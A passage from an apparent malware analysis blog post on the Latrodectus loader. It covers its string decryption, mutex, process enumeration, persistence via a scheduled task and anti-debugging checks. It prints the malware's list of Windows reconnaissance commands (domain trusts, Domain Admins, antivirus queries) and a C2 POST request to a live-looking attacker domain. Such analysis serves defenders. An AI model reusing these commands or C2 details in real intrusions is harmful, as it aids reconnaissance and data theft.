</span></span><span style=display:flex><span>    Initialize decrypted_strings <span style=color:#66d9ef>as</span> an empty byte array
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>    For each index <span style=color:#f92672>and</span> byte <span style=color:#f92672>in</span> data_enc:
</span></span><span style=display:flex><span>        Compute decrypted_byte <span style=color:#66d9ef>as</span> byte XOR ((xor_key <span style=color:#f92672>+</span> index <span style=color:#f92672>+</span> <span style=color:#ae81ff>1</span>) AND <span style=color:#ae81ff>0xFF</span>)
</span></span><span style=display:flex><span>        Append decrypted_byte to decrypted_strings
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>    Return format_string(decrypted_strings)
</span></span></code></pre></div><p>The pseudocode illustrates a decryption algorithm used by the malware to dynamically decrypt strings essential for its operations. It employs XOR encryption with a key dynamically computed based on the byte index and a constant value. This method obfuscates the original strings within data_enc, ensuring they are retrieved and formatted for use by the malware at runtime. Such techniques are common in malware to evade detection and analysis, requiring careful examination to understand the encrypted data&rsquo;s purpose and the malware&rsquo;s functionalities.</p><h3 id=malware-capabilities-analysis>Malware Capabilities Analysis</h3><h4 id=1-mutex-lock-creation>1. Mutex Lock Creation</h4><p>The Latredocus malware utilizes a hardcoded mutex string, &ldquo;runnung&rdquo;, to establish a mutex lock during execution. This mechanism serves to verify whether the malware is already running on the infected system, preventing multiple instances from operating concurrently. The use of a hardcoded mutex string is considered a programming flaw, potentially indicating oversight or a compromise in security practices.</p><h4 id=2-process-enumeration>2. Process Enumeration</h4><p>Following the decryption of strings and dynamic API resolution, Latredocus engages in process enumeration on the compromised system. This activity involves identifying and cataloging the currently running processes. By enumerating processes, the malware gains insights into the system&rsquo;s operational state and potentially identifies targets for further exploitation or interaction.</p><p>These capabilities highlight Latredocus&rsquo;s operational strategy, focusing on persistence through mutex management and system reconnaissance via process enumeration. Understanding these functionalities is crucial for developing effective mitigation strategies and enhancing system defenses against such sophisticated threats.
<img src=https://hackmd.io/_uploads/r13XD9BdC.png alt=image>
Fig. 10 Process Enumeration function used to collect infromation about the system</p><pre><code>![image](https://hackmd.io/_uploads/HyL6v9HOR.png)
&lt;figcaption&gt;&lt;center&gt;
Fig 11 : Details regarding each process to understand about their relationships with other processes&lt;/center&gt;&lt;/figcaption&gt;
</code></pre><h4 id=3-system-information-collection>3. System Information Collection</h4><p>Latredocus executes a series of commands to gather comprehensive information about the compromised system. These commands provide insights into various aspects of the victim&rsquo;s environment, aiding in further malicious activities.</p><p>Commands executed by Latredocus include:</p><pre tabindex=0><code>C:\Windows\System32\cmd.exe /c ipconfig /all
C:\Windows\System32\cmd.exe /c systeminfo
C:\Windows\System32\cmd.exe /c nltest /domain_trusts
C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts
C:\Windows\System32\cmd.exe /c net view /all /domain
C:\Windows\System32\cmd.exe /c net view /all
C:\Windows\System32\cmd.exe /c net group &#34;Domain Admins&#34; /domain
C:\Windows\System32\wbem\wmic.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
C:\Windows\System32\cmd.exe /c net config workstation
C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
C:\Windows\System32\cmd.exe /c whoami /groups
</code></pre><p>Each command retrieves specific information about network configuration, system details, domain trusts, group memberships, antivirus status, and more. This data collection phase is crucial for the malware&rsquo;s reconnaissance efforts, enabling it to gather intelligence necessary for subsequent actions.</p><p>The gathered information is structured and stored as follows:</p><pre tabindex=0><code>&amp;ipconfig=
&amp;systeminfo=
&amp;domain_trusts=
&amp;domain_trusts_all=
&amp;net_view_all_domain=
&amp;net_view_all=
&amp;net_group=
&amp;wmic=
&amp;net_config_ws=
&amp;net_wmic_av=
&amp;whoami_group=
</code></pre><p>This systematic approach allows Latredocus to maintain a comprehensive profile of the victim system, facilitating targeted attacks and informed decision-making during its operation. Understanding these capabilities is essential for detecting and mitigating the impact of such sophisticated malware threats.</p><h4 id=4-c2-communication>4. C2 Communication</h4><p>Latredocus establishes communication with its command-and-control (C2) server to receive commands and transmit victim information. The malware encrypts its requests using base64 and RC4 encryption with a hardcoded password of 12345 to obfuscate the transmitted data.</p><p>The initial POST request sent to the C2 server includes the following details:</p><pre tabindex=0><code>POST https://aytobusesre.com/live/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: aytobusesre.com
Content-Length: 256
Cache-Control: no-cache
</code></pre><p>This request contains victim information and configuration details, effectively registering the infected system with the C2 server. The use of HTTPS ensures secure transmission of data between the malware and the C2 server, while encryption helps protect the contents of the communication from detection and analysis.</p><p>Understanding Latredocus&rsquo;s C2 communication mechanisms is crucial for cybersecurity professionals to detect and mitigate the malware&rsquo;s impact on compromised systems and prevent further unauthorized activities.</p><h4 id=5-anti-analysis-techniques>5. Anti-Analysis Techniques</h4><p>Latredocus employs several anti-analysis techniques to evade detection and hinder analysis efforts:
<img src=https://hackmd.io/_uploads/HkVxs3Su0.png alt=image>
Fig. 11 Code shows that malware does and the anti-debugging check
The malware actively checks for dynamic debugging environments and terminates execution upon detection. This behavior is crucial for thwarting attempts to inspect its runtime behavior and evade detection by security analysts.
<img src=https://hackmd.io/_uploads/rJxfnnHOC.png alt=image>
Fig. 12 shows the anti-sandbox and virtual machine check</p><p>Latredocus also includes mechanisms to detect virtualized environments such as sandboxes. By monitoring the number of running processes and other environmental cues, it attempts to identify if it is executing in an isolated or monitored environment. This technique helps the malware evade detection during analysis and prevent security researchers from accurately assessing its capabilities.</p><h4 id=6-malware-setup-followed-with-persistence>6. Malware Setup followed with Persistence</h4><p>Latredocus establishes itself on infected systems with careful setup and persistence mechanisms:
<img src=https://hackmd.io/_uploads/HyY0j6ruR.png alt=image>
Fig.14 Malware creates a copy of the falcon.dll and drops it into shown folder.
After the initial installation, Latredocus drops a copy of falcon.dll into a specific directory on the system. This step ensures redundancy and allows the malware to continue functioning even if the original DLL is removed or altered.
<img src=https://hackmd.io/_uploads/BJEIgCrOC.png alt=image>
Fig.15 Scheduled Task created Latredocus creates a scheduled task named &ldquo;Updater&rdquo; as part of its persistence strategy. This task is hardcoded within the malware and ensures that the malicious activities resume automatically at predefined intervals or conditions.
<img src=https://hackmd.io/_uploads/B1ROeRrOA.png alt=image>
Fig.16 Details about the created scheduled task for persistence
The scheduled task created by Latredocus includes specific configurations and parameters designed to maintain persistence. This includes details such as execution triggers, frequency, and actions taken upon execution, ensuring the malware&rsquo;s continuous operation on the infected system.</p><p>These setup and persistence techniques demonstrate Latredocus&rsquo;s intent to maintain long-term presence on infected systems, making it challenging for security measures to detect and remove effectively.</p><h2 id=conclusion>Conclusion</h2><p>Latrodectus represents a formidable challenge for cybersecurity professionals. Its advanced evasion techniques, versatile capabilities, and persistent nature make it a significant threat. This report aims to equip cybersecurity teams with the knowledge needed to understand and defend against Latrodectus. By staying informed about the latest developments and adopting proactive defense strategies, organizations can mitigate the risks posed by this and other emerging malware threats.</p><h2 id=key-takeaways>Key Takeaways</h2><ol><li>Infection Chain: Latrodectus uses sophisticated methods involving JavaScript and WMI to infiltrate systems.
Capabilities: It can deploy additional payloads, perform extensive system enumeration, and execute various commands.</li><li>Evasion Techniques: Obfuscation and anti-analysis checks are key to its stealth.</li><li>Persistence: Scheduled tasks ensure it remains active on infected systems.</li><li>Command-and-Control: Robust C2 communication facilitates its adaptability and resilience.</li><li>Development: New features indicate ongoing development and a possible connection to IcedID.</li></ol></p></div><div class=prev-next></div><svg id="btt-button" class="arrow-logo" height="1em" viewBox="0 0 384 512" onclick="topFunction()" title="Go to top"><path d="M177 159.7l136 136c9.4 9.4 9.4 24.6.0 33.9l-22.6 22.6c-9.4 9.4-24.6 9.4-33.9.0L160 255.9l-96.4 96.4c-9.4 9.4-24.6 9.4-33.9.0L7 329.7c-9.4-9.4-9.4-24.6.0-33.9l136-136c9.4-9.5 24.6-9.5 34-.1z"/></svg>
<script>let mybutton=document.getElementById("btt-button");window.onscroll=function(){scrollFunction()};function scrollFunction(){document.body.scrollTop>20||document.documentElement.scrollTop>20?mybutton.style.display="block":mybutton.style.display="none"}function topFunction(){smoothScrollToTop()}function smoothScrollToTop(){const e=()=>{const t=document.documentElement.scrollTop||document.body.scrollTop;t>0&&(window.requestAnimationFrame(e),window.scrollTo(0,t-t/8))};e()}</script></div></main><footer class=footer><span>&copy; 2024 The Marauders</span>
<span>Made with &#10084;&#65039; using <a target=_blank href=https://github.com/526avijitgupta/gokarna>Gokarna</a></span></footer></body></html>